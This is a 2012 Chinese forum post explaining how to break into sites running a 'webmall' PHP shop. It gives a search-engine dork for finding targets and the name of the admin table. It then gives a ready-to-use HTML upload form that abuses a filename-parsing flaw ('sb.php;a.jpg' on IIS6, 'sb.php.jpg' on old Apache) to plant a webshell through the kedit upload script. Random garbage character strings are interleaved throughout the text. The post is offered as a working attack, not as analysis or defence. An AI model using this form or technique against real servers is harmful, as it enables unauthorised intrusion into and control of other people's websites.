关键字:inurl:webmall/detail.php?id
0 N7 {* y0 K, E* t( _; F, o4 U H( p! r3 k" F2 J
数据表:pwn_base_admin5 W8 a) |% \% b& n) D
& u" S+ ^9 o1 o. ?- \" k c0 b关于拿shell" H/ q% U5 C \- c: a, c# ], B
2 _: f. k6 _4 ~首先登录后台admin.php: h7 L( z' h1 M3 n" ?% a) R" ~
C# G. V8 F! W" @* L看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
" J# s" k$ ?' ^+ P0 Q换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
2 g) W" U3 p# w' z然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的$ t* d$ f' V2 @' u1 J2 n4 ^
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> 7 g1 I1 n! k$ j4 S( D) J5 N. Q
<input type="text" name="fileName" value="sb.php;a.jpg" /> 1 t& H3 X- ~/ k3 j y. J0 A
<input type="hidden" name="attachPath" value="news/pics/" /> ) {1 i7 `! S6 B$ i9 }& j
<input type="file" name="fileData" size="14" /></td>
" Q7 [7 }) c" }( W. Z: U4 w$ p<input type="submit" name="button" value="确定" />
( v7 q. ~! H. e2 i* f- X</form>
) ~1 E6 @( v+ ?9 q, s9 t. x9 t5 L 8 ^; f/ }9 A- x# \9 @7 O+ K* B
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。6 U/ ~5 y3 x3 u5 ?4 X
$ I. Z/ ~# H2 _- A+ r
|
发表于 2012-11-9 20:52:15
收藏
支持
反对